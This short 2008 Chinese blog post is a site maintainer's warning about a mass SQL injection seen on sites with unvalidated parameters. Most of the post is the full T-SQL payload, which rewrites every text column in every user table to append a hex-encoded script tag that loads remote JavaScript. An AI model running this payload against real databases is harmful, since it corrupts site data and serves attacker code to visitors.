Posted on 2008-05-07 16:58
LuckPanda 阅读(434)
评论(2) 编辑 收藏 所属分类:
Others
;declare @t varchar(255),@c varchar(255) declare table_cursor cursor for select a.name,b.name from sysobjects a,syscolumns b where a.id=b.id and a.xtype='u' and (b.xtype=99 or b.xtype=35 or b.xtype=231 or b.xtype=167) open table_cursor fetch next from table_cursor into @t,@c while(@@fetch_status=0) begin exec('update ['+@t+'] set ['+@c+']=rtrim(convert(varchar,['+@c+']))+cast(0x3c2f7469746c653e223e3c736372697074207372633d687474703a2f2f2536312533312533382533382532452537372537332f312e6a733e3c2f7363726970743e3c212d2d as varchar(67))') fetch next from table_cursor into @t,@c end close table_cursor deallocate table_cursor;
参数后加入以上代码,是我这两天在维护几个网站时看到的相同情形。
对于那些没有验证参数合法的网站就会遭此劫难。
而且这些攻击者,似乎已经把该url收藏,并定时访问,直到你修复了该漏洞,够狠吧!